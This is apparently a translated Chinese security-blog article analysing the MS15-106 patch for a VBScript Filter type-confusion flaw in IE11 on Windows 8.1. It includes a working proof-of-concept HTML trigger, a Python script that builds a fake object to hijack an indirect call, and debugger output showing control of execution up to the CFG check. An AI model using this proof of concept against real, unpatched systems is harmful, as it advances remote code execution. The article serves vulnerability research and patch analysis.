回归最本质的信息安全

Windows VBScript漏洞补丁分析到POC构造

2016年10月25日发布

3,351
0
0

导语:在2015年10月13日,著名的漏洞小组Zero Day Initiative公布了一个影响WindowsIE浏览器的漏洞ZDI-15-521,可以看一下ZDI关于这个漏洞细节的报告:

漏洞介绍

在2015年10月13日,著名的漏洞小组Zero Day Initiative公布了一个影响WindowsIE浏览器的漏洞ZDI-15-521,可以看一下ZDI关于这个漏洞细节的报告:

根据漏洞细节报告可以看出这个漏洞是由于VBScript脚本的Filter方法在处理不正确的参数时,误将一个整数当作指针指向内存中的对象,造成对象类型混淆漏洞。攻击者通过该漏洞可以远程代码执行。

微软也在第一时间修复了该漏洞MS15-106。本文将通过补丁对比,进而构造能触发该漏洞的POC。这里我使用的两个版本分别是KB3093983– MS15-106和KB3087038– MS15-094,系统环境为Windows8.1 X64 IE11,其中影响漏洞的VBScript分别是修复后vbscript.dll 5.8.9600.18052和修复前vbscript.dll5.8.9600.18036。

补丁对比

根据ZDI的漏洞细节报告,我们知道触发漏洞是VBScript的Filter函数,Filter函数在二进制代码层面是通过vbscript!VbsFilter函数实现的。在这里可以使用Bindiff(之前已经介绍过)或者Turbodiff二进制比对工具进行比对,这里我们使用Nicolae Economou的Turbodiff进行分析,可以发现VbsFilte函数改变的比较多:

可以看到vbscript!VbsFilter在补丁前后代码修改的比较多,如下图所示(左边是补丁前,右边是补丁后):

我们仔细看一下MSDN关于VBScript的Filter函数的描述:

该函数的执行流程如下:

1. 首先验证参数的个数。最少2个最多4个参数(最后的两个参数,Include和Compare是可选的)。如果没有Include,默认值设置为True;如果没有Compare,默认值设置为0,表示vbBinaryCompare.
2. 接着验证第二个参数值是否是一个字符串.
3. 获取第一个参数(InputStrings)的VarType,校验是否为一个数组.
4. 在验证上述参数完之后,调用vbscript!rtFilter完成后续工作.

在比对时我发现,补丁前后最大的不同是对Filter函数的第一个参数(InputStrings)的验证。根据Filter函数的官方文档,第一个参数是这样描述的“要搜索的一维字符串数组”。

看一下补丁前后,是如何验证传入Filter函数的参数,左边是漏洞版本,右边是补丁版本:

对补丁前后的代码进行简单的分析,代码首先调用VAR::PvarGetVarVal函数,返回值为一个指向某对象的指针。其中该指针指向内容的头2个字节表示该对象的类型,即 VarType函数的返回值,例如 vbNull (1), vbLong (3), vbString (8), vbBoolean(11).

在左边漏洞版本的代码执行流程可以看到,获取VarType值作为第一个参数,接着进行ANDEAX, 2000h操作。漏洞代码校验Filter函数的第一个参数是否为其他类型,其中0x2000表示VBScript的基本VarType数组。有关VarType的函数的信息,详见官方文档。

现在我们知道,VBScript可以处理不同类型得由VBScript创建的变量数组,因此如果调用函数VarType(arr),返回值是0x200c,其中0x2000=vbArray,0x0c=vbVariant.

在右边的补丁版本我们可以看到,校验Filter函数的第一个参数时更加严格:VarType必须是0x200c或者0x600c。在MSDN中0x600c没有进行说明,但是可以证实是VBScript中基本的VarType多维数组。因此我们现在可以知道,补丁版本的VBScript解释器确保Filter函数的第一个参数要么是一个一维变量数组,要么是一个多维变量数组,其他的类型都不会接受。换句话说就是Filter函数接受的参数只能是一维变量数组或者多维变量数组。因此补丁后的版本看起来是修复了这个对象类型混淆漏洞。

构造POC触发漏洞

要触发漏洞,关键问题是能否找到一个非变量数组,因此我们必须要通过其他方式来创建这个数组而不是通过VBScript。在网上查了很多相关资料,幸运的是在一篇帖子为“Whydoes VarType() ALWAYS return 8204 for Arrays?”中获得一些有用的信息:

可以看到VBScript可以处理那些来源不是VBScript创建的非变量数组,例如通过ActiveX对象创建的。刚开始我通过使用ADODB ActiveX objects创建了一个非变量数组,例如ADODB.Connection 和 ADODB.Recordset。然而尽管这对脚本来说是安全的,但是一旦在IE上跑起来的时候,会要求允许实例化ActiveX对象,因此该方案不可行。

幸运的是,搜索到另外一种解决方案,可以使用XMLHttpRequest,既能够满足脚本的安全性,而且不会要求用户允许。代码示例如下:

function read_file(filename){
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("GET", filename,  false);
    xmlhttp.send();
    return xmlhttp.responseBody;
}

根据这些信息就可以编写第一个POC来触发漏洞了,创建一个可控的数组,VarType=0x2011而不是0x200c。使用JS来创建一个XMLHttpRequest对象,使用该对象可以从Web服务器获取任意数据,接着就是导致responseBody数组传入VBScript代码。如果成功的话,VBScript代码会通过MessageBox弹出对话框,最后调用Filter漏洞函数,详细的POC如下:

<html>
<head>
  <meta  http-equiv="x-ua-compatible" content="IE=10">
  <title>First PoC for  MS15-106</title>
</head>
<body>
<script type="text/vbscript">
Function show_var_type(arg)
    Dim result
    '&H2011 = &H2000 (vbArray) |  &H11 (vbByte)
    MsgBox(Hex(VarType(arg)))
    result = Filter(arg, "w00tw00t",  1, 1)
End Function
</script>
<script type="text/javascript">
function triggerjs(){
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("GET",  "/some_data", false);
    xmlhttp.send();
    /* XMLHttpRequest.responseBody is a  VBArray object containing the raw bytes. */
    return xmlhttp.responseBody;
}
</script>
<form>
<input type="button" value="PoC"  name="conjs"  onClick="javascript:show_var_type(triggerjs())"/>
</form>
</body>
</html>

控制EIP

下面看看执行该POC文件是如何触发该漏洞。首先VBScript解释器会检查当前数组是否为一维数组,如果条件满足,则调用vbscript!VbsFilter函数:

继续跟进vbscript!VbsFilter函数。ECX寄存器指向的是XMLHttpRequest的请求数据,随后调用函数VAR::BstrGetVal,该函数的返回值是一个代表VBScript对象的字符串。然而由于类型混淆漏洞的存在,我们控制的任意对象数据就被解释成了VBScript对象。

跟进VAR::BstrGetVal函数我们发现,内部又会调用VAR::PvarGetVarVal函数:

VAR::PvarGetVarVal函数获取我们伪造的对象的VarType,如果结果是9,则调用VAR::ObjGetDefault:

注意,在调用VAR::ObjGetDefault前,执行了MOV ECX,DWORD [ECX+8]指令,由于ECX指向的是XMLHttpRequest的请求数据,因此该指令将我们构造的请求数据偏移值+8的数据传入ECX寄存器中,所以继续跟进VAR::ObjGetDefault,我们可以看到最终的漏洞触发点:

通过Call dword ptr[ESI]间接调用,而在这里我们已经可以完全控制ESI寄存器了,因此实际上可以进行任意代码执行了。可惜,在间接调用前还存在call ds:quard check icall fptr调用,很明显是CFG保护。所以呢,这里还需要做点其他事,绕过此处的CFG。构造一个python脚本,生成一个名为”some_data”的文件,该文件包含的是XMLHttpRequest请求的数据,包括了精心构造的VBScript对象数据:

import struct
with open("some_data",  "wb") as f:
     f.write(struct.pack('<H', 0x0009))        # varType == vbObject
     f.write(struct.pack('>H', 0x5051))        # dummy
     f.write(struct.pack('<L', 0x41414141))    # dummy
  
     # On Windows 8.1, dword[0x7ffe0270] == 0x00000003  --> call dword[0x00000003]
     f.write(struct.pack('<L', 0x7ffe0270))
     f.write(struct.pack('<L', 0x43434343))    # dummy

注意,第一个dword值为0x0009,代表了构造的vbObject,执行流程:

VbsFilter ->rtFilter -> VAR::BstrGetVal -> VAR::PvarGetVarVal ->VAR::ObjGetDefault -> CALL DWORD [ESI].

运行该POC,附加调试器,可以捕获到IE直接crash的信息,调用CFG校验信息如下:

vbscript!VAR::ObjGetDefault+0x6f:
64af91798b0e            mov     ecx,dword ptr [esi]  ds:0023:00000003=????????
0:006> u @eip
vbscript!VAR::ObjGetDefault+0x6f:
64af91798b0e            mov     ecx,dword ptr [esi]
64af917bff1534e3b364    call    dword ptr[vbscript!__guard_check_icall_fptr (64b3e334)]
64af9181ff16            call    dword ptr [esi]
64af91833bfc            cmp     edi,esp
64af91850f8529590000    jne     vbscript!VAR::ObjGetDefault+0x7d(64afeab4)
64af918b85c0            test    eax,eax
64af918d0f883d230100    js      vbscript!VAR::ObjGetDefault+0x123c6(64b0b4d0)
64af91938d442410        lea     eax,[esp+10h]

从这里可以看到,如果完整利用该漏洞的话,首先还需要bypass ASLR,接着CFG就会继续代码的执行。

本文翻译于coresecurity,如若转载,请注明来源于嘶吼: http://www.4hou.com/technology/1464.html

点赞 0
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

Change

Change

嘶吼编辑

发私信

发表评论